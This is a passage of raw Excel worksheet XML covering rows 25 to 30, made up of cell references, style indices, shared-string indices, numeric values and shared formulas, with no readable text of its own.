        <v>18.0</v>
      </c>
      <c r="CX25" s="79" t="s">
        <v>383</v>
      </c>
      <c r="CY25" s="88" t="s">
        <v>384</v>
      </c>
      <c r="CZ25" s="88"/>
      <c r="DA25" s="88"/>
      <c r="DB25" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC25" s="88"/>
      <c r="DD25" s="88"/>
      <c r="DE25" s="88"/>
      <c r="DF25" s="88"/>
      <c r="DG25" s="89"/>
      <c r="DH25" s="89"/>
      <c r="DI25" s="89"/>
      <c r="DJ25" s="89">
        <v>1.0</v>
      </c>
      <c r="DK25" s="89"/>
      <c r="DL25" s="89"/>
      <c r="DM25" s="89"/>
      <c r="DN25" s="89"/>
      <c r="DO25" s="89"/>
      <c r="DP25" s="89"/>
      <c r="DQ25" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR25" s="91"/>
      <c r="DS25" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT25" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU25" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV25" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW25" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX25" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY25" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ25" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA25" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB25" s="74">
        <v>3.0</v>
      </c>
      <c r="EC25" s="74">
        <v>0.0</v>
      </c>
      <c r="ED25" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE25" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="26" ht="153.75" customHeight="1">
      <c r="B26" s="111" t="s">
        <v>262</v>
      </c>
      <c r="C26" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D26" s="72" t="s">
        <v>385</v>
      </c>
      <c r="E26" s="72" t="s">
        <v>386</v>
      </c>
      <c r="F26" s="72" t="s">
        <v>387</v>
      </c>
      <c r="G26" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H26" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I26" s="73" t="s">
        <v>388</v>
      </c>
      <c r="J26" s="115" t="s">
        <v>389</v>
      </c>
      <c r="K26" s="73" t="s">
        <v>390</v>
      </c>
      <c r="L26" s="74">
        <v>215.0</v>
      </c>
      <c r="M26" s="74">
        <v>212.0</v>
      </c>
      <c r="N26" s="74">
        <v>212.0</v>
      </c>
      <c r="O26" s="74">
        <f t="shared" si="1"/>
        <v>212</v>
      </c>
      <c r="P26" s="74">
        <v>212.0</v>
      </c>
      <c r="Q26" s="74">
        <v>0.0</v>
      </c>
      <c r="R26" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S26" s="76" t="s">
        <v>391</v>
      </c>
      <c r="T26" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U26" s="77" t="s">
        <v>392</v>
      </c>
      <c r="V26" s="76" t="s">
        <v>393</v>
      </c>
      <c r="W26" s="76" t="s">
        <v>394</v>
      </c>
      <c r="X26" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y26" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z26" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA26" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB26" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC26" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD26" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE26" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF26" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG26" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH26" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI26" s="78"/>
      <c r="AJ26" s="78"/>
      <c r="AK26" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL26" s="78"/>
      <c r="AM26" s="78"/>
      <c r="AN26" s="78"/>
      <c r="AO26" s="78"/>
      <c r="AP26" s="80"/>
      <c r="AQ26" s="80"/>
      <c r="AR26" s="80"/>
      <c r="AS26" s="80">
        <v>0.0</v>
      </c>
      <c r="AT26" s="80"/>
      <c r="AU26" s="80"/>
      <c r="AV26" s="80"/>
      <c r="AW26" s="80"/>
      <c r="AX26" s="80"/>
      <c r="AY26" s="80"/>
      <c r="AZ26" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA26" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB26" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC26" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD26" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE26" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF26" s="82"/>
      <c r="BG26" s="82"/>
      <c r="BH26" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI26" s="82"/>
      <c r="BJ26" s="82"/>
      <c r="BK26" s="82"/>
      <c r="BL26" s="82"/>
      <c r="BM26" s="83"/>
      <c r="BN26" s="83"/>
      <c r="BO26" s="83"/>
      <c r="BP26" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ26" s="83"/>
      <c r="BR26" s="83"/>
      <c r="BS26" s="83"/>
      <c r="BT26" s="83"/>
      <c r="BU26" s="83"/>
      <c r="BV26" s="83"/>
      <c r="BW26" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX26" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY26" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ26" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA26" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB26" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC26" s="85"/>
      <c r="CD26" s="85"/>
      <c r="CE26" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF26" s="85"/>
      <c r="CG26" s="85"/>
      <c r="CH26" s="85"/>
      <c r="CI26" s="85"/>
      <c r="CJ26" s="86"/>
      <c r="CK26" s="86"/>
      <c r="CL26" s="86"/>
      <c r="CM26" s="86">
        <v>0.0</v>
      </c>
      <c r="CN26" s="86"/>
      <c r="CO26" s="86"/>
      <c r="CP26" s="86"/>
      <c r="CQ26" s="86"/>
      <c r="CR26" s="86"/>
      <c r="CS26" s="86"/>
      <c r="CT26" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU26" s="88" t="s">
        <v>395</v>
      </c>
      <c r="CV26" s="88">
        <v>4.0</v>
      </c>
      <c r="CW26" s="88">
        <v>12.0</v>
      </c>
      <c r="CX26" s="79" t="s">
        <v>396</v>
      </c>
      <c r="CY26" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ26" s="88"/>
      <c r="DA26" s="88"/>
      <c r="DB26" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC26" s="88"/>
      <c r="DD26" s="88"/>
      <c r="DE26" s="88"/>
      <c r="DF26" s="88"/>
      <c r="DG26" s="89"/>
      <c r="DH26" s="89"/>
      <c r="DI26" s="89"/>
      <c r="DJ26" s="89">
        <v>0.0</v>
      </c>
      <c r="DK26" s="89"/>
      <c r="DL26" s="89"/>
      <c r="DM26" s="89"/>
      <c r="DN26" s="89"/>
      <c r="DO26" s="89"/>
      <c r="DP26" s="89"/>
      <c r="DQ26" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR26" s="91"/>
      <c r="DS26" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT26" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU26" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV26" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW26" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX26" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY26" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ26" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA26" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB26" s="74">
        <v>183.0</v>
      </c>
      <c r="EC26" s="74">
        <v>0.0</v>
      </c>
      <c r="ED26" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE26" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="27" ht="153.75" customHeight="1">
      <c r="B27" s="71" t="s">
        <v>262</v>
      </c>
      <c r="C27" s="72" t="s">
        <v>397</v>
      </c>
      <c r="D27" s="72" t="s">
        <v>385</v>
      </c>
      <c r="E27" s="72" t="s">
        <v>398</v>
      </c>
      <c r="F27" s="72" t="s">
        <v>399</v>
      </c>
      <c r="G27" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H27" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I27" s="73" t="s">
        <v>400</v>
      </c>
      <c r="J27" s="73" t="s">
        <v>401</v>
      </c>
      <c r="K27" s="73" t="s">
        <v>402</v>
      </c>
      <c r="L27" s="74">
        <v>42.0</v>
      </c>
      <c r="M27" s="74">
        <v>1.0</v>
      </c>
      <c r="N27" s="74">
        <v>1.0</v>
      </c>
      <c r="O27" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P27" s="74">
        <v>1.0</v>
      </c>
      <c r="Q27" s="74">
        <v>0.0</v>
      </c>
      <c r="R27" s="75" t="s">
        <v>315</v>
      </c>
      <c r="S27" s="76" t="s">
        <v>403</v>
      </c>
      <c r="T27" s="76" t="s">
        <v>404</v>
      </c>
      <c r="U27" s="77" t="s">
        <v>405</v>
      </c>
      <c r="V27" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W27" s="109"/>
      <c r="X27" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y27" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z27" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA27" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB27" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC27" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD27" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE27" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF27" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG27" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH27" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI27" s="78"/>
      <c r="AJ27" s="78"/>
      <c r="AK27" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL27" s="78"/>
      <c r="AM27" s="78"/>
      <c r="AN27" s="78"/>
      <c r="AO27" s="78"/>
      <c r="AP27" s="80"/>
      <c r="AQ27" s="80"/>
      <c r="AR27" s="80"/>
      <c r="AS27" s="80">
        <v>0.0</v>
      </c>
      <c r="AT27" s="80"/>
      <c r="AU27" s="80"/>
      <c r="AV27" s="80"/>
      <c r="AW27" s="80"/>
      <c r="AX27" s="80"/>
      <c r="AY27" s="80"/>
      <c r="AZ27" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA27" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB27" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC27" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD27" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE27" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF27" s="82"/>
      <c r="BG27" s="82"/>
      <c r="BH27" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI27" s="82"/>
      <c r="BJ27" s="82"/>
      <c r="BK27" s="82"/>
      <c r="BL27" s="82"/>
      <c r="BM27" s="83"/>
      <c r="BN27" s="83"/>
      <c r="BO27" s="83"/>
      <c r="BP27" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ27" s="83"/>
      <c r="BR27" s="83"/>
      <c r="BS27" s="83"/>
      <c r="BT27" s="83"/>
      <c r="BU27" s="83"/>
      <c r="BV27" s="83"/>
      <c r="BW27" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX27" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY27" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ27" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA27" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB27" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC27" s="85"/>
      <c r="CD27" s="85"/>
      <c r="CE27" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF27" s="85"/>
      <c r="CG27" s="85"/>
      <c r="CH27" s="85"/>
      <c r="CI27" s="85"/>
      <c r="CJ27" s="86"/>
      <c r="CK27" s="86"/>
      <c r="CL27" s="86"/>
      <c r="CM27" s="86">
        <v>0.0</v>
      </c>
      <c r="CN27" s="86"/>
      <c r="CO27" s="86"/>
      <c r="CP27" s="86"/>
      <c r="CQ27" s="86"/>
      <c r="CR27" s="86"/>
      <c r="CS27" s="86"/>
      <c r="CT27" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU27" s="88" t="s">
        <v>290</v>
      </c>
      <c r="CV27" s="88">
        <v>2.0</v>
      </c>
      <c r="CW27" s="88">
        <v>5.0</v>
      </c>
      <c r="CX27" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY27" s="88">
        <v>50447.0</v>
      </c>
      <c r="CZ27" s="88"/>
      <c r="DA27" s="88"/>
      <c r="DB27" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC27" s="88"/>
      <c r="DD27" s="88"/>
      <c r="DE27" s="88"/>
      <c r="DF27" s="88"/>
      <c r="DG27" s="89"/>
      <c r="DH27" s="89"/>
      <c r="DI27" s="89"/>
      <c r="DJ27" s="89">
        <v>0.0</v>
      </c>
      <c r="DK27" s="89"/>
      <c r="DL27" s="89"/>
      <c r="DM27" s="89"/>
      <c r="DN27" s="89"/>
      <c r="DO27" s="89"/>
      <c r="DP27" s="89"/>
      <c r="DQ27" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR27" s="91"/>
      <c r="DS27" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT27" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU27" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV27" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW27" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX27" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY27" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ27" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA27" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB27" s="74">
        <v>104.0</v>
      </c>
      <c r="EC27" s="74">
        <v>0.0</v>
      </c>
      <c r="ED27" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE27" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="28" ht="153.75" customHeight="1">
      <c r="B28" s="71" t="s">
        <v>262</v>
      </c>
      <c r="C28" s="72" t="s">
        <v>397</v>
      </c>
      <c r="D28" s="72" t="s">
        <v>385</v>
      </c>
      <c r="E28" s="72" t="s">
        <v>406</v>
      </c>
      <c r="F28" s="72" t="s">
        <v>407</v>
      </c>
      <c r="G28" s="72" t="s">
        <v>408</v>
      </c>
      <c r="H28" s="72" t="s">
        <v>409</v>
      </c>
      <c r="I28" s="73" t="s">
        <v>410</v>
      </c>
      <c r="J28" s="73" t="s">
        <v>411</v>
      </c>
      <c r="K28" s="73" t="s">
        <v>412</v>
      </c>
      <c r="L28" s="74">
        <v>9.0</v>
      </c>
      <c r="M28" s="74">
        <v>1.0</v>
      </c>
      <c r="N28" s="74"/>
      <c r="O28" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P28" s="74">
        <v>1.0</v>
      </c>
      <c r="Q28" s="74">
        <v>0.0</v>
      </c>
      <c r="R28" s="75" t="s">
        <v>269</v>
      </c>
      <c r="S28" s="112" t="s">
        <v>413</v>
      </c>
      <c r="T28" s="76" t="s">
        <v>414</v>
      </c>
      <c r="U28" s="77" t="s">
        <v>415</v>
      </c>
      <c r="V28" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W28" s="109"/>
      <c r="X28" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y28" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z28" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA28" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB28" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC28" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD28" s="78">
        <v>1444.0</v>
      </c>
      <c r="AE28" s="78">
        <v>1.0</v>
      </c>
      <c r="AF28" s="78">
        <v>2.0</v>
      </c>
      <c r="AG28" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH28" s="78">
        <v>1444.0</v>
      </c>
      <c r="AI28" s="78"/>
      <c r="AJ28" s="78"/>
      <c r="AK28" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL28" s="78"/>
      <c r="AM28" s="78"/>
      <c r="AN28" s="78"/>
      <c r="AO28" s="78"/>
      <c r="AP28" s="80"/>
      <c r="AQ28" s="80"/>
      <c r="AR28" s="80"/>
      <c r="AS28" s="80">
        <v>0.0</v>
      </c>
      <c r="AT28" s="80"/>
      <c r="AU28" s="80"/>
      <c r="AV28" s="80"/>
      <c r="AW28" s="80"/>
      <c r="AX28" s="80"/>
      <c r="AY28" s="80"/>
      <c r="AZ28" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA28" s="82" t="s">
        <v>416</v>
      </c>
      <c r="BB28" s="82">
        <v>4.0</v>
      </c>
      <c r="BC28" s="116">
        <v>98.0</v>
      </c>
      <c r="BD28" s="79">
        <v>2008120.0</v>
      </c>
      <c r="BE28" s="82" t="s">
        <v>417</v>
      </c>
      <c r="BF28" s="82"/>
      <c r="BG28" s="82"/>
      <c r="BH28" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI28" s="82"/>
      <c r="BJ28" s="82"/>
      <c r="BK28" s="82"/>
      <c r="BL28" s="82"/>
      <c r="BM28" s="83"/>
      <c r="BN28" s="83"/>
      <c r="BO28" s="83"/>
      <c r="BP28" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ28" s="83"/>
      <c r="BR28" s="83"/>
      <c r="BS28" s="83"/>
      <c r="BT28" s="83"/>
      <c r="BU28" s="83"/>
      <c r="BV28" s="83"/>
      <c r="BW28" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX28" s="85" t="s">
        <v>416</v>
      </c>
      <c r="BY28" s="85">
        <v>4.0</v>
      </c>
      <c r="BZ28" s="85">
        <v>98.0</v>
      </c>
      <c r="CA28" s="79">
        <v>2008120.0</v>
      </c>
      <c r="CB28" s="85" t="s">
        <v>417</v>
      </c>
      <c r="CC28" s="85"/>
      <c r="CD28" s="85"/>
      <c r="CE28" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF28" s="85"/>
      <c r="CG28" s="85"/>
      <c r="CH28" s="85"/>
      <c r="CI28" s="85"/>
      <c r="CJ28" s="86"/>
      <c r="CK28" s="86"/>
      <c r="CL28" s="86"/>
      <c r="CM28" s="86">
        <v>0.0</v>
      </c>
      <c r="CN28" s="86"/>
      <c r="CO28" s="86"/>
      <c r="CP28" s="86"/>
      <c r="CQ28" s="86"/>
      <c r="CR28" s="86"/>
      <c r="CS28" s="86"/>
      <c r="CT28" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU28" s="88" t="s">
        <v>418</v>
      </c>
      <c r="CV28" s="88">
        <v>8.0</v>
      </c>
      <c r="CW28" s="88">
        <v>121.0</v>
      </c>
      <c r="CX28" s="79" t="s">
        <v>419</v>
      </c>
      <c r="CY28" s="88" t="s">
        <v>420</v>
      </c>
      <c r="CZ28" s="88"/>
      <c r="DA28" s="88"/>
      <c r="DB28" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC28" s="88"/>
      <c r="DD28" s="88"/>
      <c r="DE28" s="88"/>
      <c r="DF28" s="88"/>
      <c r="DG28" s="89"/>
      <c r="DH28" s="89"/>
      <c r="DI28" s="89"/>
      <c r="DJ28" s="89">
        <v>0.0</v>
      </c>
      <c r="DK28" s="89"/>
      <c r="DL28" s="89"/>
      <c r="DM28" s="89"/>
      <c r="DN28" s="89"/>
      <c r="DO28" s="89"/>
      <c r="DP28" s="89"/>
      <c r="DQ28" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR28" s="91"/>
      <c r="DS28" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT28" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU28" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV28" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW28" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX28" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY28" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ28" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA28" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB28" s="74">
        <v>3.0</v>
      </c>
      <c r="EC28" s="74">
        <v>0.0</v>
      </c>
      <c r="ED28" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE28" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="29" ht="153.75" customHeight="1">
      <c r="B29" s="71" t="s">
        <v>262</v>
      </c>
      <c r="C29" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D29" s="72" t="s">
        <v>385</v>
      </c>
      <c r="E29" s="72" t="s">
        <v>421</v>
      </c>
      <c r="F29" s="72" t="s">
        <v>422</v>
      </c>
      <c r="G29" s="72" t="s">
        <v>423</v>
      </c>
      <c r="H29" s="72" t="s">
        <v>424</v>
      </c>
      <c r="I29" s="73" t="s">
        <v>282</v>
      </c>
      <c r="J29" s="73" t="s">
        <v>425</v>
      </c>
      <c r="K29" s="73" t="s">
        <v>426</v>
      </c>
      <c r="L29" s="74">
        <v>6.0</v>
      </c>
      <c r="M29" s="74">
        <v>1.0</v>
      </c>
      <c r="N29" s="74">
        <v>1.0</v>
      </c>
      <c r="O29" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P29" s="74">
        <v>1.0</v>
      </c>
      <c r="Q29" s="74">
        <v>0.0</v>
      </c>
      <c r="R29" s="75" t="s">
        <v>269</v>
      </c>
      <c r="S29" s="76" t="s">
        <v>427</v>
      </c>
      <c r="T29" s="76" t="s">
        <v>428</v>
      </c>
      <c r="U29" s="77" t="s">
        <v>429</v>
      </c>
      <c r="V29" s="76" t="s">
        <v>430</v>
      </c>
      <c r="W29" s="76" t="s">
        <v>431</v>
      </c>
      <c r="X29" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y29" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z29" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA29" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB29" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC29" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD29" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE29" s="78">
        <v>0.0</v>
      </c>
      <c r="AF29" s="78">
        <v>0.0</v>
      </c>
      <c r="AG29" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH29" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI29" s="78"/>
      <c r="AJ29" s="78"/>
      <c r="AK29" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL29" s="78"/>
      <c r="AM29" s="78"/>
      <c r="AN29" s="78"/>
      <c r="AO29" s="78"/>
      <c r="AP29" s="80"/>
      <c r="AQ29" s="80"/>
      <c r="AR29" s="80"/>
      <c r="AS29" s="80">
        <v>0.0</v>
      </c>
      <c r="AT29" s="80"/>
      <c r="AU29" s="80"/>
      <c r="AV29" s="80"/>
      <c r="AW29" s="80"/>
      <c r="AX29" s="80"/>
      <c r="AY29" s="80"/>
      <c r="AZ29" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA29" s="102" t="s">
        <v>432</v>
      </c>
      <c r="BB29" s="82">
        <v>2.0</v>
      </c>
      <c r="BC29" s="82">
        <v>2.0</v>
      </c>
      <c r="BD29" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE29" s="102" t="s">
        <v>432</v>
      </c>
      <c r="BF29" s="102"/>
      <c r="BG29" s="102"/>
      <c r="BH29" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI29" s="102"/>
      <c r="BJ29" s="102"/>
      <c r="BK29" s="102"/>
      <c r="BL29" s="102"/>
      <c r="BM29" s="103"/>
      <c r="BN29" s="103"/>
      <c r="BO29" s="103"/>
      <c r="BP29" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ29" s="83"/>
      <c r="BR29" s="83"/>
      <c r="BS29" s="83"/>
      <c r="BT29" s="83"/>
      <c r="BU29" s="83"/>
      <c r="BV29" s="83"/>
      <c r="BW29" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX29" s="85" t="s">
        <v>433</v>
      </c>
      <c r="BY29" s="85">
        <v>5.0</v>
      </c>
      <c r="BZ29" s="85">
        <v>5.0</v>
      </c>
      <c r="CA29" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB29" s="85" t="s">
        <v>434</v>
      </c>
      <c r="CC29" s="85"/>
      <c r="CD29" s="85"/>
      <c r="CE29" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF29" s="85"/>
      <c r="CG29" s="85"/>
      <c r="CH29" s="85"/>
      <c r="CI29" s="85"/>
      <c r="CJ29" s="86"/>
      <c r="CK29" s="86"/>
      <c r="CL29" s="86"/>
      <c r="CM29" s="86">
        <v>1.0</v>
      </c>
      <c r="CN29" s="86"/>
      <c r="CO29" s="86"/>
      <c r="CP29" s="86"/>
      <c r="CQ29" s="86"/>
      <c r="CR29" s="86"/>
      <c r="CS29" s="86"/>
      <c r="CT29" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU29" s="88" t="s">
        <v>435</v>
      </c>
      <c r="CV29" s="88">
        <v>8.0</v>
      </c>
      <c r="CW29" s="88">
        <v>15.0</v>
      </c>
      <c r="CX29" s="79" t="s">
        <v>436</v>
      </c>
      <c r="CY29" s="88" t="s">
        <v>437</v>
      </c>
      <c r="CZ29" s="88"/>
      <c r="DA29" s="88"/>
      <c r="DB29" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC29" s="88"/>
      <c r="DD29" s="88"/>
      <c r="DE29" s="88"/>
      <c r="DF29" s="88"/>
      <c r="DG29" s="89"/>
      <c r="DH29" s="89"/>
      <c r="DI29" s="89"/>
      <c r="DJ29" s="89">
        <v>1.0</v>
      </c>
      <c r="DK29" s="89"/>
      <c r="DL29" s="89"/>
      <c r="DM29" s="89"/>
      <c r="DN29" s="89"/>
      <c r="DO29" s="89"/>
      <c r="DP29" s="89"/>
      <c r="DQ29" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR29" s="91"/>
      <c r="DS29" s="92">
        <v>15621.0</v>
      </c>
      <c r="DT29" s="93">
        <v>1.0</v>
      </c>
      <c r="DU29" s="93">
        <v>1.0</v>
      </c>
      <c r="DV29" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW29" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX29" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY29" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ29" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA29" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB29" s="74">
        <v>6.0</v>
      </c>
      <c r="EC29" s="74">
        <v>1.0</v>
      </c>
      <c r="ED29" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE29" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="30" ht="153.75" customHeight="1">
      <c r="B30" s="71" t="s">
        <v>262</v>
      </c>
      <c r="C30" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D30" s="72" t="s">
        <v>385</v>
      </c>
      <c r="E30" s="72" t="s">
        <v>421</v>
      </c>
      <c r="F30" s="72" t="s">
        <v>422</v>
      </c>
      <c r="G30" s="97" t="s">
        <v>438</v>
      </c>
      <c r="H30" s="72" t="s">
        <v>439</v>
      </c>
      <c r="I30" s="73" t="s">
        <v>440</v>
      </c>
      <c r="J30" s="73" t="s">
        <v>441</v>
      </c>
      <c r="K30" s="73" t="s">
        <v>442</v>
      </c>
      <c r="L30" s="74">
        <v>3.0</v>
      </c>
      <c r="M30" s="74">
        <v>1.0</v>
      </c>
      <c r="N30" s="74">
        <v>1.0</v>
      </c>
      <c r="O30" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P30" s="74">
        <v>1.0</v>
      </c>
      <c r="Q30" s="74">
        <v>0.0</v>
      </c>
